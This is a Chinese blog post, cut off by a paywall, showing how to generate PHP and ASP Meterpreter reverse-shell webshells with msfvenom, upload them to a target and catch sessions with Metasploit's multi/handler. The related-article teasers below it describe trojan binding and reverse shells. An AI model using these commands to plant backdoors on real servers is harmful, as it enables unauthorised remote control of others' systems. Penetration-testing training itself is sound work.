MSF建立webshell后门,并监听端口建立session连接

最新推荐文章于 2024-05-07 09:06:33 发布
最新推荐文章于 2024-05-07 09:06:33 发布
阅读量1.2w 收藏 32
点赞数 3
分类专栏: web攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012991692/article/details/80784258
版权

   建立反弹后门

msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php

 

注:生成的反弹木马存放在当前用户home目录下;

将生成的木马上传到目标机中,可以远程访问;

windowsasp反弹木马:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp

 

 

 

 

 

 

监听端口建立会话

1 使用handler模块

msf > use exploit/multi/handler

2 设置payload

msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windowsphp

最低0.47元/天 解锁文章
于尘世中迷途小书童
关注
  • 3
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
利用beef和msf实现session远程命令
居上
10-24 566
笔记beef启动 beef 的方法msf beef 工具目录 /usr/share/beef-xss 配置文件 config.yaml 启动 beef 的方法 1.beef-xss 2./usr/share/beef-xss/beef (使用前需要修改默认的用户名称和密码) Web 管理界面 http://127.0.0.1:3000/ui/panel Shellcode http://127.0.0.1:3000/hook.js 测试页面 http://127.0.0.1:3000/demos/butch
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4543
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
zz12345600354的博客
05-07 1232
l, --list <type> 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload <payload> 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format <format> 指定输出格式-e, --encoder <encoder> 指定需要使用的encode,指定需要使用的编码。
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 6843
生成木马进行植入
MSF怎么把木马上传到目标
nlj1860453的博客
01-29 495
想必Kali小白总是做好了木马却不知道怎么上传到目标机器上,今天我就给大家讲一下上传木马的2钟办法。第一种办法是网站上传,在kali依次输入下面代码把木马上传到网站。此时在目标浏览器输入kali的IP可以看到木马就在网站上,点击文件链接下载后就可以打开了。什么?怎么会有人不会查看IP?kali和Windows查看IP的方法:ifconfigipconfig。
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3091
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
msf之木马程序
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
09-15 1万+
捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个QQ 把它上传到了root/dy/路径下 然后开始捆绑 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe -p:指定后面的pa
msf017-010复现及木马利用
qq_56895581的博客
01-17 1235
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件,对重要数据造成严重损失。被袭击的设备被锁定,并索要300比特币赎金。
70-70.渗透测试-kali更新msf.mp4
最新发布
05-10
70-70.渗透测试-kali更新msf.mp4
linux系统安装msf的过程详解
09-14
接下来,下载并执行MSF的安装脚本: ```bash curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 ...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
无人驾驶算法学习:多传感器融合MSF算法
01-28
MSF算法的核心思想是将不同传感器的数据整合到一个统一的框架中,通过建立误差状态模型来处理传感器的噪声和不确定性。在MSF中,IMU的噪声和偏置误差被纳入到误差状态变量δx中,而这些误差通过扩展卡尔曼滤波器进行...
后渗透通过msfconsole获取一个普通的session
bring_coco的博客
11-05 4122
最近在学后渗透,首先实验一下获取普通session 虚拟机实验环境:1.kali 2.win7 实验步骤: 1.在kali终端中打开msfconsole控制台 2.进入侦听模块 3.再次开启一个终端进行(shift+ctrl+T),查看本机ip 4.利用msfvenom制作木马程序 说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell -e 编码方式 -i 编码次数 -b 在生成的程序中避免出现的值 -f exe 生成exe格式 说明:
weevely混淆webshell联动msf
灰太的表格的博客
06-15 506
weevely混淆webshell的联合msf 生成 可以看到有两个参数,分别对应着进行混淆的两种方式。我们分别来试一下 整理一下代码稍后分析下混淆过程: 利用 将混淆后的webshell进行上传,并进行连接,会传回一个交互式的shell 常用命令: :audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess. :audit_etcpasswd
webshell与反弹shell使用详解
有勇气的牛排博客
07-24 1585
1 介绍 在对linux服务器渗透测试的过程中,我们在getshell得到一个低权限的webshell,由于webshell是非交互式shell,通常要反弹一个交互式的shell,然后提权(不然提权后,还是原来的权限) 2 webshell 获取 2.1 php策略 PHP环境下反弹shell,过去我们通常用phpspy等shell自带反弹即可,这里将其反弹部分代码提取出来,访问即可反弹到指定IP端口一个普通交互shell。 (1)下面利用weevely生成一个php weevely generate 12
Metasploit Framework(MSF)的使用
热门推荐
谢公子的博客
03-01 2万+
目录 Metasploit Metasploit的安装和升级 MSF中加载自定义的exploit模块 漏洞利用(exploit) 攻击载荷(payload) Meterpreter MS17_010(永恒之蓝) Auxiliary辅助探测模块 Exploit漏洞利用模块 Payload攻击载荷模块 后渗透阶段 Post后渗透模块 查看主机是否运行在虚拟机上 关闭杀毒...
msf 获取一个普通的session 控制windows
weixin_44286136的博客
05-19 2644
msf 获取session 在kali终端中打开msfconsole控制台 开启监听 use exploit/multi/handler 设置tcp监听 set payload windows/meterpreter/reverse_tcp 再次开启一个终端进行(shift+ctrl+T),查看本机ip 利用msfvenom制作木马程序 说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell -e 编码方式 -i 编码次数 -b 在生成的程序
msf生成webshell_Metasploit 之使用socket通信的webshell简单分析
weixin_39693193的博客
12-22 330
Metasploit 之使用socket通信的webshell简单分析upload (Van Helsing) | 2013-01-08 21:530x01 前言常规的webshell都是调用该语言中常用函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式:socket通信。常见的脚本语言asp,php,jsp,都可以实现对应的socket编程...
msf shell连接超时
03-08
当使用Metasploit Framework (MSF)进行渗透测试时,有时可能会遇到MSF shell连接超时的问题。这通常是由于以下几个原因导致的: 1. 目标主机不可达:如果目标主机无法访问或者网络连接不稳定,可能会导致MSF shell连接超时。请确保目标主机处于可访问状态,并且网络连接正常。 2. 目标主机防火墙:目标主机上的防火墙可能会阻止MSF shell连接。请检查目标主机的防火墙设置,并确保允许MSF shell连接的端口通过防火墙。 3. 目标主机服务未启动:如果目标主机上没有运行可以接受MSF shell连接的服务,那么连接将无法建立。请确保目标主机上已经启动了相应的服务,例如开放了SSH服务或者其他远程管理服务。 4. MSF配置错误:有时候,MSF的配置可能会导致连接超时。请检查MSF的配置文件,确保正确配置了监听器和有效的目标主机信息。 如果遇到MSF shell连接超时的问题,可以尝试以下解决方法: 1. 检查网络连接:确保目标主机处于可访问状态,并且网络连接正常。 2. 检查防火墙设置:检查目标主机上的防火墙设置,确保允许MSF shell连接的端口通过防火墙。 3. 检查服务状态:确保目标主机上已经启动了可以接受MSF shell连接的服务。 4. 检查MSF配置:检查MSF的配置文件,确保正确配置了监听器和有效的目标主机信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值